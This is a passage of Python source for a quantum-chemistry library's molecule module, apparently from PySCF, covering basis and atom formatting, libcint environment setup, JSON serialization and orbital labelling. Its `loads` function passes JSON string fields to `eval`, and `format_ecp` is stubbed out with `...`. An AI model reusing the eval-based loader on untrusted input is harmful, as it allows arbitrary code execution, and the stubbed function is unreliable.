ctypes.c_int(kappa))\n    return c2sph  # was: undefined name c2spinor\n\ndef cart2j_l(l):\n    '''Cartesian to spinor, indexed by l'''\n    nf = (l+1)*(l+2)//2\n    nd = l * 4 + 2\n    c2sph = numpy.zeros((nf,nd), order='F', dtype=numpy.complex)\n    cmat = numpy.eye(nf)\n    # NOTE: same assumed libcgto transform as in cart2j_kappa above\n    fn = moleintor.libcgto.CINTc2s_ket_spinor\n    fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n       cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l), ctypes.c_int(0))\n    return c2sph  # was: undefined name c2spinor\n\ndef atom_types(atoms, basis=None):\n    '''symmetry inequivalent atoms'''\n    atmgroup = {}\n    for ia, a in enumerate(atoms):\n        if a[0] in atmgroup:\n            atmgroup[a[0]].append(ia)\n        elif basis is None:\n            atmgroup[a[0]] = [ia]\n        else:\n            stdsymb = _std_symbol(a[0])\n            if a[0] in basis:\n                if stdsymb in basis and basis[a[0]] == basis[stdsymb]:\n                    if stdsymb in atmgroup:\n                        atmgroup[stdsymb].append(ia)\n                    else:\n                        atmgroup[stdsymb] = [ia]\n                else:\n                    
atmgroup[a[0]] = [ia]\n elif stdsymb in atmgroup:\n atmgroup[stdsymb].append(ia)\n else:\n atmgroup[stdsymb] = [ia]\n return atmgroup\n\n\ndef format_atom(atoms, origin=0, axes=1, unit='Ang'):\n '''Convert the input :attr:`Mole.atom` to the internal data format.\n Including, changing the nuclear charge to atom symbol, converting the\n coordinates to AU, rotate and shift the molecule.\n If the :attr:`~Mole.atom` is a string, it takes \";\" and \"\\\\n\"\n for the mark to separate atoms; \",\" and arbitrary length of blank space\n to spearate the individual terms for an atom. Blank line will be ignored.\n\n Args:\n atoms : list or str\n the same to :attr:`Mole.atom`\n\n Kwargs:\n origin : ndarray\n new axis origin.\n axes : ndarray\n (new_x, new_y, new_z), each entry is a length-3 array\n unit : str or number\n If unit is one of strings (B, b, Bohr, bohr, AU, au), the coordinates\n of the input atoms are the atomic unit; If unit is one of strings\n (A, a, Angstrom, angstrom, Ang, ang), the coordinates are in the\n unit of angstrom; If a number is given, the number are considered\n as the Bohr value (in angstrom), which should be around 0.53\n\n Returns:\n \"atoms\" in the internal format as :attr:`~Mole._atom`\n\n Examples:\n\n >>> gto.format_atom('9,0,0,0; h@1 0 0 1', origin=(1,1,1))\n [['F', [-1.0, -1.0, -1.0]], ['H@1', [-1.0, -1.0, 0.0]]]\n >>> gto.format_atom(['9,0,0,0', (1, (0, 0, 1))], origin=(1,1,1))\n [['F', [-1.0, -1.0, -1.0]], ['H', [-1, -1, 0]]]\n '''\n if isinstance(unit, str):\n if unit.startswith(('B','b','au','AU')):\n convert = 1\n else: #if unit.startswith(('A','a')):\n convert = 1./param.BOHR\n else:\n convert = 1./unit\n fmt_atoms = []\n def str2atm(line):\n dat = line.split()\n if dat[0].isdigit():\n symb = param.ELEMENTS[int(dat[0])][0]\n else:\n rawsymb = _rm_digit(dat[0])\n symb = dat[0].replace(rawsymb, _std_symbol(rawsymb))\n c = numpy.asarray([float(x) for x in dat[1:4]]) - origin\n return [symb, numpy.dot(axes, c*convert).tolist()]\n\n if isinstance(atoms, str):\n atoms = atoms.replace(';','\\n').replace(',',' ').replace('\\t',' ')\n for line in atoms.split('\\n'):\n line1 = line.strip()\n if line1 and not line1.startswith('#'):\n fmt_atoms.append(str2atm(line))\n else:\n for atom in atoms:\n if isinstance(atom, str):\n line1 = atom.strip()\n if line1 and not line1.startswith('#'):\n fmt_atoms.append(str2atm(atom.replace(',',' ')))\n else:\n if isinstance(atom[0], int):\n symb = param.ELEMENTS[atom[0]][0]\n else:\n a = atom[0].strip()\n rawsymb = _rm_digit(a)\n symb = a.replace(rawsymb, _std_symbol(rawsymb))\n if isinstance(atom[1], (int, float)):\n c = numpy.asarray(atom[1:4]) - origin\n else:\n c = numpy.asarray(atom[1]) - origin\n fmt_atoms.append([symb, numpy.dot(axes, c*convert).tolist()])\n return fmt_atoms\n\n#TODO: sort exponents\ndef format_basis(basis_tab):\n '''Convert the input :attr:`Mole.basis` to the internal data format.\n\n ``{ atom: [(l, ((-exp, c_1, c_2, ..),\n (-exp, c_1, c_2, ..))),\n (l, ((-exp, c_1, c_2, ..),\n (-exp, c_1, c_2, ..)))], ... 
}``\n\n    Args:\n        basis_tab : dict\n            Similar to :attr:`Mole.basis`, it **cannot** be a str\n\n    Returns:\n        Formatted :attr:`~Mole.basis`\n\n    Examples:\n\n    >>> gto.format_basis({'H':'sto-3g', 'H^2': '3-21g'})\n    {'H': [[0,\n        [3.4252509099999999, 0.15432897000000001],\n        [0.62391373000000006, 0.53532813999999995],\n        [0.16885539999999999, 0.44463454000000002]]],\n     'H^2': [[0,\n        [5.4471780000000001, 0.15628500000000001],\n        [0.82454700000000003, 0.90469100000000002]],\n        [0, [0.18319199999999999, 1.0]]]}\n    '''\n    def nparray_to_list(item):\n        val = []\n        for x in item:\n            if isinstance(x, (tuple, list)):\n                val.append(nparray_to_list(x))\n            elif isinstance(x, numpy.ndarray):\n                val.append(x.tolist())\n            else:\n                val.append(x)\n        return val\n\n    fmt_basis = {}\n    for atom in basis_tab.keys():\n        symb = _symbol(atom)\n        rawsymb = _rm_digit(symb)\n        stdsymb = _std_symbol(rawsymb)\n        symb = symb.replace(rawsymb, stdsymb)\n\n        atom_basis = basis_tab[atom]\n        if isinstance(atom_basis, str):\n            if atom_basis.lower().startswith('unc'):\n                fmt_basis[symb] = uncontract(basis.load(atom_basis[3:], stdsymb))\n            else:\n                fmt_basis[symb] = basis.load(atom_basis, stdsymb)\n        else:\n            fmt_basis[symb] = nparray_to_list(atom_basis)\n    return fmt_basis\n\ndef uncontract_basis(_basis):\n    '''Uncontract internal format _basis\n\n    Examples:\n\n    >>> gto.uncontract_basis(gto.load('sto3g', 'He'))\n    [[0, [6.3624213899999997, 1]], [0, [1.1589229999999999, 1]], [0, [0.31364978999999998, 1]]]\n    '''\n    ubasis = []\n    for b in _basis:\n        angl = b[0]\n        if isinstance(b[1], int):\n            kappa = b[1]\n            for p in b[2:]:\n                ubasis.append([angl, kappa, [p[0], 1]])\n        else:\n            for p in b[1:]:\n                ubasis.append([angl, [p[0], 1]])\n    return ubasis\nuncontract = uncontract_basis\n\ndef format_ecp(ecp_tab):\n    '''\n    ``{ atom: (nelec, # core electrons\n            ((l, # l=-1 for UL, l>=0 for Ul to indicate |l><l|\n              ...)),\n          ...)}``\n    '''\n    ...\n\ndef expand_etb(l, n, alpha, beta):\n    r'''Generate an even tempered shell: exponents alpha*beta**i for i = n-1 .. 0\n\n    Examples:\n\n    >>> gto.expand_etb(1, 3, 1.5, 2)\n    [[1, [6.0, 1]], [1, [3.0, 1]], [1, [1.5, 1]]]\n    '''\n    return [[l, [alpha*beta**i, 1]] for i in reversed(range(n))]\ndef expand_etbs(etbs):\n    r'''Generate even tempered basis. See also :func:`expand_etb`\n\n    Args:\n        etbs = [(l, n, alpha, beta), (l, n, alpha, beta),...]\n\n    Returns:\n        Formatted :attr:`~Mole.basis`\n\n    Examples:\n\n    >>> gto.expand_etbs([(0, 2, 1.5, 2.), (1, 2, 1, 2.)])\n    [[0, [6.0, 1]], [0, [3.0, 1]], [1, [1., 1]], [1, [2., 1]]]\n    '''\n    return pyscf.lib.flatten([expand_etb(*etb) for etb in etbs])\netbs = expand_etbs\n\n# concatenate two mol\ndef conc_env(atm1, bas1, env1, atm2, bas2, env2):\n    r'''Concatenate two Mole's integral parameters. This function can be used\n    to construct the environment for cross integrals like\n\n    .. math::\n\n        \\langle \\mu | \\nu \\rangle, \\mu \\in mol1, \\nu \\in mol2\n\n    Returns:\n        Concatenated atm, bas, env\n\n    Examples:\n        Compute the overlap between H2 molecule and O atom\n\n    >>> mol1 = gto.M(atom='H 0 1 0; H 0 0 1', basis='sto3g')\n    >>> mol2 = gto.M(atom='O 0 0 0', basis='sto3g')\n    >>> atm3, bas3, env3 = gto.conc_env(mol1._atm, mol1._bas, mol1._env,\n    ...                                 mol2._atm, mol2._bas, mol2._env)\n    >>> gto.moleintor.getints('cint1e_ovlp_sph', atm3, bas3, env3, range(2), range(2,5))\n    [[ 0.04875181 0.44714688 0. 0.37820346 0. ]\n        [ 0.04875181 0.44714688 0. 0. 0.37820346]]\n    '''\n
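    # Pointer-type slots in atm2/bas2 index into env2; shift them by len(env1)\n    # (and bas2's atom indices by len(atm1)) so they remain valid once the two\n    # env arrays are concatenated below.\n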
    off = len(env1)\n    natm_off = len(atm1)\n    atm2 = numpy.copy(atm2)\n    bas2 = numpy.copy(bas2)\n    atm2[:,PTR_COORD] += off\n    atm2[:,PTR_ZETA ] += off\n    bas2[:,ATOM_OF ] += natm_off\n    bas2[:,PTR_EXP ] += off\n    bas2[:,PTR_COEFF] += off\n    return (numpy.asarray(numpy.vstack((atm1,atm2)), dtype=numpy.int32),\n            numpy.asarray(numpy.vstack((bas1,bas2)), dtype=numpy.int32),\n            numpy.hstack((env1,env2)))\n\ndef conc_mol(mol1, mol2):\n    '''Concatenate two Mole objects.\n    '''\n    mol3 = Mole()\n    mol3._atm, mol3._bas, mol3._env = \\\n            conc_env(mol1._atm, mol1._bas, mol1._env,\n                     mol2._atm, mol2._bas, mol2._env)\n    off = len(mol1._env)\n    natm_off = len(mol1._atm)\n    if len(mol2._ecpbas) == 0:\n        mol3._ecpbas = mol1._ecpbas\n    else:\n        ecpbas2 = numpy.copy(mol2._ecpbas)\n        ecpbas2[:,ATOM_OF ] += natm_off\n        ecpbas2[:,PTR_EXP ] += off\n        ecpbas2[:,PTR_COEFF] += off\n        if len(mol1._ecpbas) == 0:\n            mol3._ecpbas = ecpbas2\n        else:\n            mol3._ecpbas = numpy.hstack((mol1._ecpbas, ecpbas2))\n\n    mol3.verbose = mol1.verbose\n    mol3.output = mol1.output\n    mol3.max_memory = mol1.max_memory\n    mol3.light_speed = mol1.light_speed\n    mol3.charge = mol1.charge + mol2.charge\n    mol3.spin = mol1.spin + mol2.spin\n    mol3.symmetry = False\n    mol3.symmetry_subgroup = None\n    mol3._atom = mol1._atom + mol2._atom\n    mol3.unit = mol1.unit\n    mol3._basis = dict(mol2._basis)\n    mol3._basis.update(mol1._basis)\n    if mol2._ecp is None:\n        mol3._ecp = mol1._ecp\n    elif mol1._ecp is None:\n        mol3._ecp = mol2._ecp\n    else:\n        mol3._ecp = dict(mol2._ecp)\n        mol3._ecp.update(mol1._ecp)\n    return mol3\n\n# <bas-of-mol1|intor|bas-of-mol2>\ndef intor_cross(intor, mol1, mol2, comp=1):\n    r'''1-electron integrals from two molecules like\n\n    .. math::\n\n        \\langle \\mu | intor | \\nu \\rangle, \\mu \\in mol1, \\nu \\in mol2\n\n    Args:\n        intor : str\n            Name of the 1-electron integral, such as cint1e_ovlp_sph (spherical overlap),\n            cint1e_nuc_cart (cartesian nuclear attraction), cint1e_ipovlp\n            (spinor overlap gradients), etc. Ref to :func:`getints` for the\n            full list of available 1-electron integral names\n        mol1, mol2:\n            :class:`Mole` objects\n\n    Kwargs:\n        comp : int\n            Components of the integrals, e.g. cint1e_ipovlp has 3 components\n\n    Returns:\n        ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n    Examples:\n        Compute the overlap between H2 molecule and O atom\n\n    >>> mol1 = gto.M(atom='H 0 1 0; H 0 0 1', basis='sto3g')\n    >>> mol2 = gto.M(atom='O 0 0 0', basis='sto3g')\n    >>> gto.intor_cross('cint1e_ovlp_sph', mol1, mol2)\n    [[ 0.04875181 0.44714688 0. 0.37820346 0. ]\n        [ 0.04875181 0.44714688 0. 0. 
0.37820346]]\n '''\n nbas1 = len(mol1._bas)\n nbas2 = len(mol2._bas)\n atmc, basc, envc = conc_env(mol1._atm, mol1._bas, mol1._env,\n mol2._atm, mol2._bas, mol2._env)\n shls_slice = (0, nbas1, nbas1, nbas1+nbas2)\n return moleintor.getints(intor, atmc, basc, envc, shls_slice, comp, 0)\n\n# append (charge, pointer to coordinates, nuc_mod) to _atm\ndef make_atm_env(atom, ptr=0):\n '''Convert the internal format :attr:`Mole._atom` to the format required\n by ``libcint`` integrals\n '''\n nuc_charge = _charge(atom[0])\n _env = numpy.hstack((atom[1], dyall_nuc_mod(param.ELEMENTS[nuc_charge][1])))\n _atm = numpy.zeros(6, dtype=numpy.int32)\n _atm[CHARGE_OF] = nuc_charge\n _atm[PTR_COORD] = ptr\n _atm[NUC_MOD_OF] = NUC_POINT\n _atm[PTR_ZETA ] = ptr + 3\n return _atm, _env\n\n# append (atom, l, nprim, nctr, kappa, ptr_exp, ptr_coeff, 0) to bas\n# absorb normalization into GTO contraction coefficients\ndef make_bas_env(basis_add, atom_id=0, ptr=0):\n '''Convert :attr:`Mole.basis` to the argument ``bas`` for ``libcint`` integrals\n '''\n _bas = []\n _env = []\n for b in basis_add:\n if not b: # == []\n continue\n angl = b[0]\n #if angl in [6, 7]:\n # print('libcint may have large error for ERI of i function')\n if isinstance(b[1], int):\n kappa = b[1]\n b_coeff = numpy.array(b[2:])\n else:\n kappa = 0\n b_coeff = numpy.array(b[1:])\n es = b_coeff[:,0]\n cs = b_coeff[:,1:]\n nprim, nctr = cs.shape\n cs = numpy.einsum('pi,p->pi', cs, gto_norm(angl, es))\n# normalize contracted AO\n #ee = numpy.empty((nprim,nprim))\n #for i in range(nprim):\n # for j in range(i+1):\n # ee[i,j] = ee[j,i] = _gaussian_int(angl*2+2, es[i]+es[j])\n #s1 = 1/numpy.sqrt(numpy.einsum('pi,pq,qi->i', cs, ee, cs))\n ee = es.reshape(-1,1) + es.reshape(1,-1)\n ee = _gaussian_int(angl*2+2, ee)\n s1 = 1/numpy.sqrt(numpy.einsum('pi,pq,qi->i', cs, ee, cs))\n cs = numpy.einsum('pi,i->pi', cs, s1)\n\n _env.append(es)\n _env.append(cs.T.reshape(-1))\n ptr_exp = ptr\n ptr_coeff = ptr_exp + nprim\n ptr = ptr_coeff + nprim * nctr\n _bas.append([atom_id, angl, nprim, nctr, kappa, ptr_exp, ptr_coeff, 0])\n _env = pyscf.lib.flatten(_env) # flatten nested lists\n return (numpy.array(_bas, numpy.int32).reshape(-1,BAS_SLOTS),\n numpy.array(_env, numpy.double))\n\ndef make_env(atoms, basis, pre_env=[], nucmod={}):\n '''Generate the input arguments for ``libcint`` library based on internal\n format :attr:`Mole._atom` and :attr:`Mole._basis`\n '''\n _atm = []\n _bas = []\n _env = []\n ptr_env = len(pre_env)\n\n for ia, atom in enumerate(atoms):\n symb = atom[0]\n atm0, env0 = make_atm_env(atom, ptr_env)\n ptr_env = ptr_env + len(env0)\n if nucmod:\n if isinstance(nucmod, int):\n assert(nucmod in (NUC_POINT, NUC_GAUSS))\n atm0[NUC_MOD_OF] = nucmod\n elif isinstance(nucmod, str):\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod)\n elif ia+1 in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[ia+1])\n elif symb in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[symb])\n elif _rm_digit(symb) in nucmod:\n atm0[NUC_MOD_OF] = _parse_nuc_mod(nucmod[_rm_digit(symb)])\n _atm.append(atm0)\n _env.append(env0)\n\n _basdic = {}\n for symb, basis_add in basis.items():\n bas0, env0 = make_bas_env(basis_add, 0, ptr_env)\n if bas0.size == 0:\n sys.stderr.write('No basis found for atom %s\\n' % symb)\n ptr_env = ptr_env + len(env0)\n _basdic[symb] = bas0\n _env.append(env0)\n\n for ia, atom in enumerate(atoms):\n symb = atom[0]\n puresymb = _rm_digit(symb)\n if symb in _basdic:\n b = _basdic[symb].copy()\n b[:,ATOM_OF] = ia\n _bas.append(b)\n elif puresymb in _basdic:\n 
b = _basdic[puresymb].copy()\n b[:,ATOM_OF] = ia\n _bas.append(b)\n else:\n sys.stderr.write('Warn: Basis not found for atom %d %s\\n' % (ia, symb))\n\n if _atm:\n _atm = numpy.asarray(numpy.vstack(_atm), numpy.int32).reshape(-1, ATM_SLOTS)\n else:\n _atm = numpy.zeros((0,ATM_SLOTS), numpy.int32)\n if _bas:\n _bas = numpy.asarray(numpy.vstack(_bas), numpy.int32).reshape(-1, BAS_SLOTS)\n else:\n _bas = numpy.zeros((0,BAS_SLOTS), numpy.int32)\n if _env:\n _env = numpy.hstack((pre_env,numpy.hstack(_env)))\n else:\n _env = numpy.array(pre_env, copy=False)\n return _atm, _bas, _env\n\ndef make_ecp_env(mol, _atm, ecp, pre_env=[]):\n _env = []\n ptr_env = len(pre_env)\n\n _ecpdic = {}\n for symb, ecp_add in ecp.items():\n ecp0 = []\n nelec = ecp_add[0]\n for lb in ecp_add[1]:\n for rorder, bi in enumerate(lb[1]):\n if len(bi) > 0:\n ec = numpy.array(bi)\n _env.append(ec[:,0])\n ptr_exp = ptr_env\n _env.append(ec[:,1])\n ptr_coeff = ptr_exp + ec.shape[0]\n ptr_env = ptr_coeff + ec.shape[0]\n ecp0.append([0, lb[0], ec.shape[0], rorder, 0,\n ptr_exp, ptr_coeff, 0])\n _ecpdic[symb] = (nelec, numpy.asarray(ecp0, dtype=numpy.int32))\n\n _ecpbas = []\n if _ecpdic:\n _atm = _atm.copy()\n for ia, atom in enumerate(mol._atom):\n symb = atom[0]\n if symb in _ecpdic:\n ecp0 = _ecpdic[symb]\n elif _rm_digit(symb) in _ecpdic:\n ecp0 = _ecpdic[_rm_digit(symb)]\n else:\n ecp0 = None\n if ecp0 is not None:\n _atm[ia,CHARGE_OF ] = _charge(symb) - ecp0[0]\n b = ecp0[1].copy()\n b[:,ATOM_OF] = ia\n _ecpbas.append(b)\n if _ecpbas:\n _ecpbas = numpy.asarray(numpy.vstack(_ecpbas), numpy.int32)\n _env = numpy.hstack((pre_env, numpy.hstack(_env)))\n else:\n _ecpbas = numpy.zeros((0,BAS_SLOTS), numpy.int32)\n _env = pre_env\n return _atm, _ecpbas, _env\n\ndef tot_electrons(mol):\n '''Total number of electrons for the given molecule\n\n Returns:\n electron number in integer\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 1 0; C 0 0 1', charge=1)\n >>> mol.tot_electrons()\n 6\n '''\n nelectron = mol.atom_charges().sum() - mol.charge\n return int(nelectron)\n\ndef copy(mol):\n '''Deepcopy of the given :class:`Mole` object\n '''\n import copy\n newmol = copy.copy(mol)\n newmol._atm = numpy.copy(mol._atm)\n newmol._bas = numpy.copy(mol._bas)\n newmol._env = numpy.copy(mol._env)\n newmol._ecpbas = numpy.copy(mol._ecpbas)\n\n newmol.atom = copy.deepcopy(mol.atom)\n newmol._atom = copy.deepcopy(mol._atom)\n newmol.basis = copy.deepcopy(mol.basis)\n newmol._basis = copy.deepcopy(mol._basis)\n newmol.ecp = copy.deepcopy(mol.ecp)\n newmol._ecp = copy.deepcopy(mol._ecp)\n return newmol\n\ndef pack(mol):\n '''Pack the input args of :class:`Mole` to a dict, which can be serialized\n with :mod:`pickle` or :mod:`json`.\n\n Note this function only packs the input arguments rather than the entire Mole\n class. 
Modifications to mol._atm, mol._bas, mol._env are not tracked.\n Use :func:`dumps` to serialize the entire Mole object.\n '''\n return {'atom' : mol.atom,\n 'unit' : mol.unit,\n 'basis' : mol.basis,\n 'charge' : mol.charge,\n 'spin' : mol.spin,\n 'symmetry': mol.symmetry,\n 'nucmod' : mol.nucmod,\n 'ecp' : mol.ecp,\n 'light_speed': mol.light_speed}\ndef unpack(moldic):\n '''Unpack a dict which is packed by :func:`pack`, to generate the input\n arguments for :class:`Mole` object.\n '''\n mol = Mole()\n mol.__dict__.update(moldic)\n return mol\n\n\ndef dumps(mol):\n '''Serialize Mole object to a JSON formatted str.\n '''\n exclude_keys = set(('output', 'stdout', '_keys'))\n nparray_keys = set(('_atm', '_bas', '_env', '_ecpbas'))\n\n moldic = dict(mol.__dict__)\n for k in exclude_keys:\n del(moldic[k])\n for k in nparray_keys:\n if isinstance(moldic[k], numpy.ndarray):\n moldic[k] = moldic[k].tolist()\n moldic['atom'] = repr(mol.atom)\n moldic['basis']= repr(mol.basis)\n moldic['ecp' ] = repr(mol.ecp)\n\n if mol.symm_orb is not None:\n # compress symm_orb\n symm_orb = []\n for c in mol.symm_orb:\n x,y = numpy.nonzero(c)\n val = c[x,y]\n symm_orb.append((val.tolist(), x.tolist(), y.tolist(), c.shape))\n moldic['symm_orb'] = symm_orb\n try:\n return json.dumps(moldic)\n except TypeError:\n import warnings\n def skip_value(dic):\n dic1 = {}\n for k,v in dic.items():\n if (v is None or\n isinstance(v, (str, bool, int, float))):\n dic1[k] = v\n elif isinstance(v, (list, tuple)):\n dic1[k] = v # Should I recursively skip_value?\n elif isinstance(v, set):\n dic1[k] = list(v)\n elif isinstance(v, dict):\n dic1[k] = skip_value(v)\n else:\n msg =('Function mol.dumps drops attribute %s because '\n 'it is not JSON-serializable' % k)\n warnings.warn(msg)\n return dic1\n return json.dumps(skip_value(moldic), skipkeys=True)\n\ndef loads(molstr):\n '''Deserialize a str containing a JSON document to a Mole object.\n '''\n from numpy import array # for eval function\n moldic = json.loads(molstr)\n if sys.version_info < (3,):\n# Convert to utf8 because the JSON loads function returns unicode.\n def byteify(inp):\n if isinstance(inp, dict):\n return dict([(byteify(k), byteify(v)) for k, v in inp.iteritems()])\n elif isinstance(inp, (tuple, list)):\n return [byteify(x) for x in inp]\n elif isinstance(inp, unicode):\n return inp.encode('utf-8')\n else:\n return inp\n moldic = byteify(moldic)\n mol = Mole()\n mol.__dict__.update(moldic)\n mol.atom = eval(mol.atom)\n mol.basis= eval(mol.basis)\n mol.ecp = eval(mol.ecp)\n mol._atm = numpy.array(mol._atm, dtype=numpy.int32)\n mol._bas = numpy.array(mol._bas, dtype=numpy.int32)\n mol._env = numpy.array(mol._env, dtype=numpy.double)\n mol._ecpbas = numpy.array(mol._ecpbas, dtype=numpy.int32)\n\n if mol.symm_orb is not None:\n # decompress symm_orb\n symm_orb = []\n for val, x, y, shape in mol.symm_orb:\n c = numpy.zeros(shape)\n c[numpy.array(x),numpy.array(y)] = numpy.array(val)\n symm_orb.append(c)\n mol.symm_orb = symm_orb\n return mol\n\n\n
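# --- Added note (not part of the original pyscf source): a minimal round-trip sketch\n# for the four serialization helpers above, assuming a built Mole object:\n#   molstr = dumps(mol)            # entire object -> JSON string\n#   mol1 = loads(molstr)           # JSON string -> new Mole\n#   moldic = pack(mol)             # input arguments only -> plain dict\n#   mol2 = unpack(moldic).build()  # dict -> Mole; build() regenerates _atm/_bas/_env\n\n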
def len_spinor(l, kappa):\n '''The number of spinors associated with given angular momentum and kappa. If kappa is 0,\n return 4l+2\n '''\n if kappa == 0:\n n = (l * 4 + 2)\n elif kappa < 0:\n n = (l * 2 + 2)\n else:\n n = (l * 2)\n return n\n\ndef len_cart(l):\n '''The number of Cartesian functions associated with given angular momentum.\n '''\n return (l + 1) * (l + 2) // 2\n\ndef npgto_nr(mol, cart=False):\n '''Total number of primitive spherical GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n if cart:\n return ((l+1)*(l+2)//2 * mol._bas[:,NPRIM_OF]).sum()\n else:\n return ((l*2+1) * mol._bas[:,NPRIM_OF]).sum()\ndef nao_nr(mol, cart=False):\n '''Total number of contracted spherical GTOs for the given :class:`Mole` object'''\n if cart:\n return nao_cart(mol)\n else:\n return ((mol._bas[:,ANG_OF]*2+1) * mol._bas[:,NCTR_OF]).sum()\ndef nao_cart(mol):\n '''Total number of contracted cartesian GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n return ((l+1)*(l+2)//2 * mol._bas[:,NCTR_OF]).sum()\n\n# nao_id0:nao_id1 corresponding to bas_id0:bas_id1\ndef nao_nr_range(mol, bas_id0, bas_id1):\n '''Lower and upper boundary of contracted spherical basis functions associated\n with the given shell range\n\n Args:\n mol :\n :class:`Mole` object\n bas_id0 : int\n start shell id\n bas_id1 : int\n stop shell id\n\n Returns:\n tuple of start basis function id and the stop function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.nao_nr_range(mol, 2, 4)\n (2, 6)\n '''\n ao_loc = moleintor.make_loc(mol._bas[:bas_id1], 'sph')\n nao_id0 = ao_loc[bas_id0]\n nao_id1 = ao_loc[-1]\n return nao_id0, nao_id1\n\ndef nao_2c(mol):\n '''Total number of contracted spinor GTOs for the given :class:`Mole` object'''\n l = mol._bas[:,ANG_OF]\n kappa = mol._bas[:,KAPPA_OF]\n dims = (l*4+2) * mol._bas[:,NCTR_OF]\n dims[kappa<0] = l[kappa<0] * 2 + 2\n dims[kappa>0] = l[kappa>0] * 2\n return dims.sum()\n\n# nao_id0:nao_id1 corresponding to bas_id0:bas_id1\ndef nao_2c_range(mol, bas_id0, bas_id1):\n '''Lower and upper boundary of contracted spinor basis functions associated\n with the given shell range\n\n Args:\n mol :\n :class:`Mole` object\n bas_id0 : int\n start shell id, 0-based\n bas_id1 : int\n stop shell id, 0-based\n\n Returns:\n tuple of start basis function id and the stop function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.nao_2c_range(mol, 2, 4)\n (4, 12)\n '''\n ao_loc = moleintor.make_loc(mol._bas[:bas_id1], '')\n nao_id0 = ao_loc[bas_id0]\n nao_id1 = ao_loc[-1]\n return nao_id0, nao_id1\n\ndef ao_loc_nr(mol, cart=False):\n '''Offset of every shell in the spherical basis function spectrum\n\n Returns:\n list, each entry is the corresponding start basis function id\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.ao_loc_nr(mol)\n [0, 1, 2, 3, 6, 9, 10, 11, 12, 15, 18]\n '''\n if cart:\n return moleintor.make_loc(mol._bas, 'cart')\n else:\n return moleintor.make_loc(mol._bas, 'sph')\n\ndef ao_loc_2c(mol):\n '''Offset of every shell in the spinor basis function spectrum\n\n Returns:\n list, each entry is the corresponding start id of spinor function\n\n Examples:\n\n >>> mol = gto.M(atom='O 0 0 0; C 0 0 1', basis='6-31g')\n >>> gto.ao_loc_2c(mol)\n [0, 2, 4, 6, 12, 18, 20, 22, 24, 30, 36]\n '''\n return moleintor.make_loc(mol._bas, 'spinor')\n\ndef time_reversal_map(mol):\n r'''The index to map the spinor functions and their time reversal counterparts.\n The returned indices have positive or negative values. 
For the i-th basis function,\n if the returned j = idx[i] < 0, it means :math:`T|i\\rangle = -|j\\rangle`,\n otherwise :math:`T|i\\rangle = |j\\rangle`\n '''\n tao = []\n i = 0\n for b in mol._bas:\n l = b[ANG_OF]\n if b[KAPPA_OF] == 0:\n djs = (l * 2, l * 2 + 2)\n elif b[KAPPA_OF] > 0:\n djs = (l * 2,)\n else:\n djs = (l * 2 + 2,)\n if l % 2 == 0:\n for n in range(b[NCTR_OF]):\n for dj in djs:\n for m in range(0, dj, 2):\n tao.append(-(i + dj - m))\n tao.append( i + dj - m - 1)\n i += dj\n else:\n for n in range(b[NCTR_OF]):\n for dj in djs:\n for m in range(0, dj, 2):\n tao.append( i + dj - m)\n tao.append(-(i + dj - m - 1))\n i += dj\n return tao\n\ndef energy_nuc(mol):\n '''Nuclear repulsion energy (AU)\n\n Returns:\n float\n '''\n if mol.natm == 0:\n return 0\n #e = 0\n #chargs = [mol.atom_charge(i) for i in range(len(mol._atm))]\n #coords = [mol.atom_coord(i) for i in range(len(mol._atm))]\n #for j in range(len(mol._atm)):\n # q2 = chargs[j]\n # r2 = coords[j]\n # for i in range(j):\n # q1 = chargs[i]\n # r1 = coords[i]\n # r = numpy.linalg.norm(r1-r2)\n # e += q1 * q2 / r\n chargs = mol.atom_charges()\n coords = mol.atom_coords()\n rr = numpy.dot(coords, coords.T)\n rd = rr.diagonal()\n rr = rd[:,None] + rd - rr*2\n rr[numpy.diag_indices_from(rr)] = 1e-60\n r = numpy.sqrt(rr)\n qq = chargs[:,None] * chargs[None,:]\n qq[numpy.diag_indices_from(qq)] = 0\n e = (qq/r).sum() * .5\n return e\n\ndef spheric_labels(mol, fmt=True):\n '''Labels for spheric GTO functions\n\n Kwargs:\n fmt : str or bool\n if fmt is boolean, it controls whether to format the labels and the\n default format is \"%d%3s %s%-4s\". if fmt is string, the string will\n be used as the print format.\n\n Returns:\n List of [(atom-id, symbol-str, nl-str, str-of-real-spheric-notation)]\n or formatted strings based on the argument \"fmt\"\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> gto.spheric_labels(mol)\n [(0, 'H', '1s', ''), (1, 'Cl', '1s', ''), (1, 'Cl', '2s', ''), (1, 'Cl', '3s', ''), (1, 'Cl', '2p', 'x'), (1, 'Cl', '2p', 'y'), (1, 'Cl', '2p', 'z'), (1, 'Cl', '3p', 'x'), (1, 'Cl', '3p', 'y'), (1, 'Cl', '3p', 'z')]\n '''\n count = numpy.zeros((mol.natm, 9), dtype=int)\n label = []\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l = mol.bas_angular(ib)\n strl = param.ANGULAR[l]\n nc = mol.bas_nctr(ib)\n symb = mol.atom_symbol(ia)\n nelec_ecp = mol.atom_nelec_core(ia)\n if nelec_ecp == 0 or l > 3:\n shl_start = count[ia,l]+l+1\n else:\n coreshl = pyscf.gto.ecp.core_configuration(nelec_ecp)\n shl_start = coreshl[l]+count[ia,l]+l+1\n for n in range(shl_start, shl_start+nc):\n for m in range(-l, l+1):\n label.append((ia, symb, '%d%s' % (n, strl), \\\n '%s' % param.REAL_SPHERIC[l][l+m]))\n count[ia,l] += nc\n if isinstance(fmt, str):\n return [(fmt % x) for x in label]\n elif fmt:\n return ['%d %s %s%-4s' % x for x in label]\n else:\n return label\n\ndef 